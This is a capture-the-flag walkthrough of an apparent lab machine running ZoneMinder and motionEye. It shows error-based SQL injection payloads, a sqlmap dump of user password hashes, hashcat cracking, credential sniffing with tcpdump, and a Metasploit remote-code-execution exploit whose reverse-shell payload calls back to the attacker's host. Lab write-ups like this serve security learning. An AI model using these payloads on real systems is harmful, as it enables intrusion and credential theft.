by 0xW1LD

As usual we start off with an nmap port scan
1
2
3
4
5
6
7
8
9
10
11
12
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDZ15GCLPzC4gTM0nqzpUbr/2L77bM1C9sbBecivQPX/KcKvJrP88peCJXwTug7T/EORHr7M7JeHtMQJ6hYihFA=
| 256 e3:9b:38:08:9a:d7:e9:d1:94:11:ff:50:80:bc:f2:59 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKitA8JIvpUZg84xCOEAX17k1W9xZDviZdnUrcoPRreb
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.58
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: SecureVision CCTV & Security Solutions
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have the usual linux ports: 22 - OpenSSH on Ubuntu, and 80 - Apache httpd. Let’s visit the http website and take a look.
Visiting the CCTV website we’re greeted by: Secure Vision, a CCTV monitoring, access control, consultation service.

Taking a look at the Staff Login we find a ZoneMinder login page.

Attempting usage of the default credentials: admin:admin logs us in!

Looking around we can find the Zone Minder version is v1.37.63, checking for CVEs we can find CVE-2024-51482 a boolean based SQLinjection. However we don’t have to do this blind, instead we can do an Error Based SQLi because in the log tab we can actually see errors so we can do error based SQLi instead.
If we send the following request we get a 500 response.
1
2
3
4
5
6
7
8
9
10
11
12
GET /zm/index.php?view=request&request=event&action=removetag&tid=1%20OR%201%3D1--%20- HTTP/1.1
Host: cctv.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://cctv.htb/zm/index.php?view=log
Cookie: zmControlTable.bs.table.hiddenColumns=%5B%22Id%22%5D; zmLogsTable.bs.table.pageList=500; zmLogsTable.bs.table.pageNumber=27; zmSkin=classic; zmCSS=base; ZMSESSID=6ilfq84s02da2see7isdkdm0iu
However, checking the logs we can see the error
1
2
3/7/26, 11:43:53 PM UTC web_php 1530 ERR SQL-ERR 'SQLSTATE[22007]: Invalid datetime format: 1292 Truncated incorrect INTEGER value: '1 OR 1=1-- -'', statement was 'DELETE FROM Tags WHERE Id = ?' params:1 OR 1=1-- - /usr/share/zoneminder/www/includes/database.php 161
3/7/26, 11:43:53 PM UTC web_php 1530 ERR SQL-ERR 'SQLSTATE[22007]: Invalid datetime format: 1292 Truncated incorrect INTEGER value: '1 OR 1=1-- -'', statement was 'DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?' params:1 OR 1=1-- -, /usr/share/zoneminder/www/includes/database.php 161
Attempting a simple Error Based injection payload through this request:
1
2
3
4
5
6
7
8
9
10
11
12
GET /zm/index.php?view=request&request=event&action=removetag&tid=1%20AND%20EXTRACTVALUE(1%2CCONCAT(0x7e%2C%40%40version))--%20- HTTP/1.1
Host: cctv.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://cctv.htb/zm/index.php?view=log
Cookie: zmControlTable.bs.table.hiddenColumns=%5B%22Id%22%5D; zmLogsTable.bs.table.pageList=500; zmLogsTable.bs.table.pageNumber=27; zmSkin=classic; zmCSS=base; ZMSESSID=6ilfq84s02da2see7isdkdm0iu
Gets us the following errors
1
2
3/7/26, 11:47:53 PM UTC web_php 1531 ERR SQL-ERR 'SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~8.0.45-0ubuntu0.24.04.1'', statement was 'SELECT * FROM Events_Tags WHERE TagId = 1 AND EXTRACTVALUE(1,CONCAT(0x7e,@@version))-- -' params: /usr/share/zoneminder/www/includes/database.php 161
3/7/26, 11:47:53 PM UTC web_php 1531 ERR SQL-ERR 'SQLSTATE[22007]: Invalid datetime format: 1292 Truncated incorrect INTEGER value: '1 AND EXTRACTVALUE(1,CONCAT(0x7e,@@version))-- -'', statement was 'DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?' params:1 AND EXTRACTVALUE(1,CONCAT(0x7e,@@version))-- -, /usr/share/zoneminder/www/includes/database.php 161
We can clearly see the value: ~8.0.45-0ubuntu0.24.04.1' after the XPATH syntax error, let’s extract the current database name:
1
2
3
1 AND EXTRACTVALUE(1,CONCAT(0x7e,database()))-- -
~zm
Let’s extract the username and password from the database:
1
2
3
4
5
6
7
8
9
10
11
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(Username,0x3a,Password) FROM Users LIMIT 0,1)))-- -
~superadmin:$2y$10$cmytVWFRnt1Xf
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,21,100) FROM Users LIMIT 0,1)))-- -
~qsItsJRVe/ApxWxcIFQcURnm5N.rh
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,50,100) FROM Users LIMIT 0,1)))-- -
~lULwM0jrtbm
Combining all these together we get a bcrypt hash.
1
2
3
4
5
$ hashid -m '$2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm'
Analyzing '$2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x
[+] bcrypt [Hashcat Mode: 3200]
Let’s go for the next user following the same sequence.
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(Username,0x3a,Password) FROM Users LIMIT 1,1)))-- -
~mark:$2y$10$prZGnazejKcuTv5bKNe
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,27,100) FROM Users LIMIT 1,1)))-- -
~xXOgLyQaok0hq07LW7AJ/QNqZolbXKf
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTR(Password,58,100) FROM Users LIMIT 1,1)))-- -
~FG.
We could do the same for the last user but after the first query we can see that it’s the admin user and we already know admin’s password is admin.
1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(Username,0x3a,Password) FROM Users LIMIT 2,1)))-- -
~admin:$2y$10$t5z8uIT.n9uCdHCNid
Now that we’ve learned how the manual method works, here’s how to configure sqlmap to do it automatically.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
$ sqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' -H "Cookie: zmControlTable.bs.table.hiddenColumns=%5B%22Id%22%5D; zmLogsTable.bs.table.pageList=10; zmLogsTable.bs.table.pageNumber=1; zmSkin=classic; zmCSS=base; ZMSESSID=0bhfbh36rk5feculqivjm4uojr" -p tid --batch --dbms mysql --technique E --second-url 'http://cctv.htb/zm/index.php?view=request&request=log&task=query&search=&offset=0&limit=10' --regexp "XPATH syntax error" -T Users -D zm --dump -v 0
___
__H__
___ ___[.]_____ ___ ___ {1.10.2#stable}
|_ -| . [ ] | . | . |
|___|_ [ ]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:18:07 /2026-03-09/
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 6 HTTP(s) requests:
---
Parameter: tid (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: view=request&request=event&action=removetag&tid=1 AND EXTRACTVALUE(9922,CONCAT(0x5c,0x7178706271,(SELECT (ELT(9922=9922,1))),0x717a6a6a71))
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.58
back-end DBMS: MySQL >= 5.1
[01:18:14] [INFO] retrieved: 'APIEnabled'
[01:18:14] [INFO] retrieved: 'tinyint unsigned'
[01:18:14] [INFO] retrieved: 'Control'
[01:18:14] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:14] [INFO] retrieved: 'Devices'
[01:18:14] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:15] [INFO] retrieved: 'Email'
[01:18:15] [INFO] retrieved: 'varchar(64)'
[01:18:15] [INFO] retrieved: 'Enabled'
[01:18:15] [INFO] retrieved: 'tinyint unsigned'
[01:18:15] [INFO] retrieved: 'Events'
[01:18:15] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:15] [INFO] retrieved: 'Groups'
[01:18:15] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:16] [INFO] retrieved: 'HomeView'
[01:18:16] [INFO] retrieved: 'varchar(64)'
[01:18:16] [INFO] retrieved: 'Id'
[01:18:16] [INFO] retrieved: 'int unsigned'
[01:18:16] [INFO] retrieved: 'Language'
[01:18:16] [INFO] retrieved: 'varchar(8)'
[01:18:16] [INFO] retrieved: 'MaxBandwidth'
[01:18:16] [INFO] retrieved: 'varchar(16)'
[01:18:16] [INFO] retrieved: 'Monitors'
[01:18:17] [INFO] retrieved: 'enum('None','View','Edit','Create')'
[01:18:17] [INFO] retrieved: 'Name'
[01:18:17] [INFO] retrieved: 'varchar(64)'
[01:18:17] [INFO] retrieved: 'Password'
[01:18:17] [INFO] retrieved: 'varchar(64)'
[01:18:17] [INFO] retrieved: 'Phone'
[01:18:17] [INFO] retrieved: 'varchar(64)'
[01:18:17] [INFO] retrieved: 'Snapshots'
[01:18:17] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:18] [INFO] retrieved: 'Stream'
[01:18:18] [INFO] retrieved: 'enum('None','View')'
[01:18:18] [INFO] retrieved: 'System'
[01:18:18] [INFO] retrieved: 'enum('None','View','Edit')'
[01:18:18] [INFO] retrieved: 'TokenMinExpiry'
[01:18:18] [INFO] retrieved: 'bigint unsigned'
[01:18:18] [INFO] retrieved: 'Username'
[01:18:18] [INFO] retrieved: 'varchar(64)'
[01:18:19] [INFO] retrieved: '1'
[01:18:19] [INFO] retrieved: 'Edit'
[01:18:19] [INFO] retrieved: 'Edit'
[01:18:19] [INFO] retrieved: ''
[01:18:19] [INFO] retrieved: '1'
[01:18:19] [INFO] retrieved: 'console'
[01:18:19] [INFO] retrieved: '1'
[01:18:19] [INFO] retrieved: ''
[01:18:19] [INFO] retrieved: 'Create'
[01:18:20] [INFO] retrieved: '$2y$10$cmytVWFRnt1XfqsItsJRVe\\/ApxWxcIFQcURnm5N.rhlULwM0jrtbm'
[01:18:20] [INFO] retrieved: ''
[01:18:20] [INFO] retrieved: 'Edit'
[01:18:20] [INFO] retrieved: '0'
[01:18:20] [INFO] retrieved: 'superadmin'
[01:18:20] [INFO] retrieved: 'Edit'
[01:18:20] [INFO] retrieved: 'Edit'
[01:18:20] [INFO] retrieved: ''
[01:18:20] [INFO] retrieved: ''
[01:18:21] [INFO] retrieved: 'View'
[01:18:21] [INFO] retrieved: 'Edit'
[01:18:21] [INFO] retrieved: '1'
[01:18:21] [INFO] retrieved: 'Edit'
[01:18:21] [INFO] retrieved: 'Edit'
[01:18:21] [INFO] retrieved: ''
[01:18:21] [INFO] retrieved: '1'
[01:18:21] [INFO] retrieved: 'console'
[01:18:21] [INFO] retrieved: '2'
[01:18:21] [INFO] retrieved: ''
[01:18:21] [INFO] retrieved: 'Create'
[01:18:22] [INFO] retrieved: '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ\\/QNqZolbXKfFG.'
[01:18:22] [INFO] retrieved: ''
[01:18:22] [INFO] retrieved: 'None'
[01:18:22] [INFO] retrieved: '0'
[01:18:22] [INFO] retrieved: 'mark'
[01:18:22] [INFO] retrieved: 'Edit'
[01:18:22] [INFO] retrieved: 'Edit'
[01:18:22] [INFO] retrieved: ''
[01:18:23] [INFO] retrieved: 'mark'
[01:18:23] [INFO] retrieved: 'View'
[01:18:23] [INFO] retrieved: 'View'
[01:18:23] [INFO] retrieved: '1'
[01:18:23] [INFO] retrieved: 'Edit'
[01:18:23] [INFO] retrieved: 'Edit'
[01:18:23] [INFO] retrieved: ''
[01:18:23] [INFO] retrieved: '1'
[01:18:23] [INFO] retrieved: 'console'
[01:18:23] [INFO] retrieved: '3'
[01:18:24] [INFO] retrieved: ''
[01:18:24] [INFO] retrieved: 'Create'
[01:18:24] [INFO] retrieved: '$2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m'
[01:18:24] [INFO] retrieved: ''
[01:18:24] [INFO] retrieved: 'None'
[01:18:24] [INFO] retrieved: '0'
[01:18:24] [INFO] retrieved: 'admin'
[01:18:24] [INFO] retrieved: 'Edit'
[01:18:24] [INFO] retrieved: 'Edit'
[01:18:25] [INFO] retrieved: ''
[01:18:25] [INFO] retrieved: 'admin'
[01:18:25] [INFO] retrieved: 'View'
[01:18:25] [INFO] retrieved: 'View'
Database: zm
Table: Users
[3 entries]
+----+---------+---------+---------+---------+---------+---------+----------+----------+----------------------------------------------------------------+------------+----------+----------+----------+----------+-----------+------------+------------+--------------+----------------+
| Id | Email | Phone | Name | Control | Devices | Enabled | HomeView | Monitors | Password | Username | Events | Groups | Stream | System | Snapshots | APIEnabled | Language | MaxBandwidth | TokenMinExpiry |
+----+---------+---------+---------+---------+---------+---------+----------+----------+----------------------------------------------------------------+------------+----------+----------+----------+----------+-----------+------------+------------+--------------+----------------+
| 1 | <blank> | <blank> | <blank> | Edit | Edit | 1 | console | Create | $2y$10$cmytVWFRnt1XfqsItsJRVe\\/ApxWxcIFQcURnm5N.rhlULwM0jrtbm | superadmin | Edit | Edit | View | Edit | Edit | 1 | <blank> | <blank> | 0 |
| 2 | <blank> | <blank> | mark | Edit | Edit | 1 | console | Create | [REDACTED] | mark | Edit | Edit | View | View | None | 1 | <blank> | <blank> | 0 |
| 3 | <blank> | <blank> | admin | Edit | Edit | 1 | console | Create | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m | admin | Edit | Edit | View | View | None | 1 | <blank> | <blank> | 0 |
+----+---------+---------+---------+---------+---------+---------+----------+----------+----------------------------------------------------------------+------------+----------+----------+----------+----------+-----------+------------+------------+--------------+----------------+
[*] ending @ 01:18:25 /2026-03-09/
Attempting to put the first 2 hashes into hashcat we get a successful crack!
1
2
3
4
$ hashcat -m 3200 -a 0 --username hashes.pem /usr/share/wordlists/rockyou.txt -w 3
<SNIP>
[REDACTED].:[REDACTED]
Checking for password reuse against ssh we’re able to login!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ ssh mark@cctv.htb
The authenticity of host 'cctv.htb (10.129.25.226)' can't be established.
ED25519 key fingerprint is: SHA256:KrrHjS+nu1wJEfv1/NxT1fI+ODJaSRdJtFg201G+tO0
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cctv.htb' (ED25519) to the list of known hosts.
mark@cctv.htb's password:
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun 8 Mar 00:35:21 UTC 2026
System load: 0.0
Usage of /: 74.0% of 8.70GB
Memory usage: 29%
Swap usage: 0%
Processes: 255
Users logged in: 0
IPv4 address for eth0: 10.129.25.226
IPv6 address for eth0: dead:beef::250:56ff:fe95:666b
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
14 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
mark@cctv:~$
Taking a look around we can find that tcpdump has eip capabilities, meaning the CAP_NET_RAW kernel permission is effective, inheritable, and permitted
1
2
3
4
5
6
7
8
9
mark@cctv:~$ getcap / -r 2>/dev/null
/snap/core22/2292/usr/bin/ping cap_net_raw=ep
/snap/snapd/25935/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin=p
/snap/core24/1349/usr/bin/ping cap_net_raw=ep
/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin=p
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin,cap_sys_nice=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/tcpdump cap_net_raw=eip
/usr/bin/ping cap_net_raw=ep
Let’s dump a packet capture, I ran it for 2 minutes.
1
2
3
4
5
6
7
mark@cctv:~$ tcpdump -i any -w /tmp/w1ld.pcap -G 120 -W 1
tcpdump: data link type LINUX_SLL2
tcpdump: listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
Maximum file limit reached: 1
12218 packets captured
12475 packets received by filter
0 packets dropped by kernel
Opening this in wireshark and using the filter tcp contains "sa_mark" we’re able to find a cleartext credential being transported.
1
2
USERNAME=sa_mark;PASSWORD=[REDACTED];CMD=status
All CCTV cameras are operational
Attempting to swap to sa_mark we’re able to login!
1
2
3
4
5
6
mark@cctv:~$ su sa_mark
Password:
$ whoami
sa_mark
$ ls -lash ~/user.txt
4.0K -rw-r----- 1 root sa_mark 33 Mar 8 01:39 /home/sa_mark/user.txt
Just like that, we have User!
Taking a look around we can find a few interesting ports running.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mark@cctv:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.54:53 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8554 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:9081 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:8765 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8888 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:7999 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:1935 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 4096 [::]:22 [::]:*
The port 8765 is interesting as it’s the motionEye web server.
1
2
3
4
5
6
7
mark@cctv:~$ curl 127.0.0.1:8765 -I
HTTP/1.1 200 OK
Server: motionEye/0.43.1b4
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Mar 2026 00:58:06 GMT
Etag: "da39a3ee5e6b4b0d3255bfef95601890afd80709"
Content-Length: 0
Port forwarding the port to my localhost we can access the motionEye interface with the sa_mark credentials we found using the username: admin.

Looking around we can find a motionEye and motion version
1
2
motionEye Version 0.43.1b4
Motion Version 4.7.1
Based on this we can find CVE-2025-60787 which has a metasploit module. So let’s use that.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
$ msfconsole
Metasploit tip: Use help <command> to learn more about any command
.~+P``````-o+:. -o+:.
.+oooyysyyssyyssyddh++os-````` ``````````````` `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///
`...............` `...-/////...`
.::::::::::-. .::::::-
.hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
:Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
.sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
-Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
-Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
`oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
.yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
.shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/
`///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
/MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
-hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
.sMMmo. -dMd--:mN/` ||--X--|| ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================
Press ENTER to size up the situation
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It s always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Press SPACE BAR to continue
=[ metasploit v6.4.112-dev ]
+ -- --=[ 2,607 exploits - 1,325 auxiliary - 1,707 payloads ]
+ -- --=[ 429 post - 49 encoders - 14 nops - 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
msf > search motioneye
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/motioneye_auth_rce_cve_2025_60787 2025-09-09 excellent Yes Remote Code Execution Vulnerability in MotionEye Frontend (CVE-2025-60787)
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/motioneye_auth_rce_cve_2025_60787
msf > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > show options
Module options (exploit/linux/http/motioneye_auth_rce_cve_2025_60787):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password used to authenticate to MotionEye
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to MotionEye
USERNAME admin yes The username used to authenticate to MotionEye
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST 192.168.177.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME sKkkrImSz no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Unix Command
View the full module info with the info, or info -d command.
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set lhost tun0
lhost => 10.10.14.3
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set rport 8765
rport => 8765
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > set password [REDACTED]
password => [REDACTED]
msf exploit(linux/http/motioneye_auth_rce_cve_2025_60787) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 0.43.1b4, which is vulnerable
[*] Adding malicious camera...
[+] Camera successfully added
[*] Setting up exploit...
[+] Exploit setup complete
[*] Triggering exploit...
[+] Exploit triggered, waiting for session...
[*] Sending stage (3090404 bytes) to 10.129.25.226
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.129.25.226:60730) at 2026-03-07 20:04:52 -0500
[*] Removing camera
[+] Camera removed successfully
meterpreter > shell
Process 7053 created.
Channel 1 created.
whoami
root
Just like that, we have Root!
tags: os/linux - diff/easy